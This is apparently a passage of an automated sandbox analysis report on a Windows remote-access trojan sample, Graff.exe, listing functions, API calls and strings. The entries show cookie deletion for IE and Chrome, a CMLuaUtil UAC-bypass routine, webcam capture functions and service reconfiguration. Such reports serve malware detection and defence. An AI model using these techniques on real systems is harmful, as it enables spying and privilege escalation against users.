__IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
_ValidateLocalCookies.LIBCMT ref: 00437BC1

Strings

csm, xrefs: 00437B56

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95

Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
PathFileExistsA.SHLWAPI(?), ref: 0040B779

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040B703
[IE cookies not found], xrefs: 0040B741
Cookies, xrefs: 0040B6FE
[IE cookies cleared!], xrefs: 0040B7C6, 0040B7E6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: b630fcd6310307d56adfb8f1cc3360878e6ee31590ee129aa5d16ed004954343
Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
Opcode Fuzzy Hash: b630fcd6310307d56adfb8f1cc3360878e6ee31590ee129aa5d16ed004954343
Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE

Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA

Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
int.LIBCPMT ref: 0040FC0F

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FC4B
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D

Strings

P[G, xrefs: 0040FC94

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: P[G
API String ID: 2536120697-571123470
Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D

Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10009221: _free.LIBCMT ref: 1000924A

_free.LIBCMT ref: 100092AB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100092B6
_free.LIBCMT ref: 100092C1
_free.LIBCMT ref: 10009315
_free.LIBCMT ref: 10009320
_free.LIBCMT ref: 1000932B
_free.LIBCMT ref: 10009336

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B

_free.LIBCMT ref: 0044FD29

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

_free.LIBCMT ref: 0044FD34
_free.LIBCMT ref: 0044FD3F
_free.LIBCMT ref: 0044FD93
_free.LIBCMT ref: 0044FD9E
_free.LIBCMT ref: 0044FDA9
_free.LIBCMT ref: 0044FDB4

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645

Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00406835

Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

CoUninitialize.COMBASE ref: 0040688E

Strings

[+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 00406815, 00406818, 0040686A
[+] ShellExec success, xrefs: 00406873
[+] before ShellExec, xrefs: 00406856

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Users\user\AppData\Local\misruling\Graff.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-1906739757
Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669

Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
int.LIBCPMT ref: 0040FEF2

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FF2E
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70

Strings

H]G, xrefs: 0040FEEA

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: H]G
API String ID: 2536120697-1717957184
Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799

Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
GetLastError.KERNEL32 ref: 0040B2EE

Strings

[Chrome Cookies found, cleared!], xrefs: 0040B314
[Chrome Cookies not found], xrefs: 0040B308
UserProfile, xrefs: 0040B2B4
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 0a97e1cd53e0339cd2c94eb65698e548b497aa9eea375c55f1c4a93bdb76ff10
Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
Opcode Fuzzy Hash: 0a97e1cd53e0339cd2c94eb65698e548b497aa9eea375c55f1c4a93bdb76ff10
Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE

Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 00406927
Rmc-MKYDDH, xrefs: 0040693F
BG, xrefs: 00406909

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\misruling\Graff.exe$Rmc-MKYDDH$BG
API String ID: 0-2413298339
Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C

Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00439789
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
__allrem.LIBCMT ref: 004397BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
__allrem.LIBCMT ref: 004397F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58

Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
__freea.LIBCMT ref: 10008A08

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

__freea.LIBCMT ref: 10008A11
__freea.LIBCMT ref: 10008A36

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00444B69
__cftoe.LIBCMT ref: 00444B9B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D

Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00446261
__freea.LIBCMT ref: 0044630B
__freea.LIBCMT ref: 00446329

Strings

am/pm, xrefs: 0044638C
a/p, xrefs: 004463F0

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B

Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00403E8A

Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2

Strings

FreeFrame, xrefs: 00403F76
GetFrame, xrefs: 00403F65
CloseCamera, xrefs: 00403F54
OpenCamera, xrefs: 00403F48
P>G, xrefs: 00403FAC

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
API String ID: 3469354165-462540288
Opcode ID: 136ead670094840ac813a5929f13461ad7b459fc11066ceb364bfe5da003821c
Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
Opcode Fuzzy Hash: 136ead670094840ac813a5929f13461ad7b459fc11066ceb364bfe5da003821c
Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF

Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001607
_strcat.LIBCMT ref: 1000161D
lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: lstrcatlstrlen$_strcat_strlen
String ID:
API String ID: 1922816806-0
Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9

Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: lstrlen$AttributesFilelstrcat
String ID:
API String ID: 3594823470-0
Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50

Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9

Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300

Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
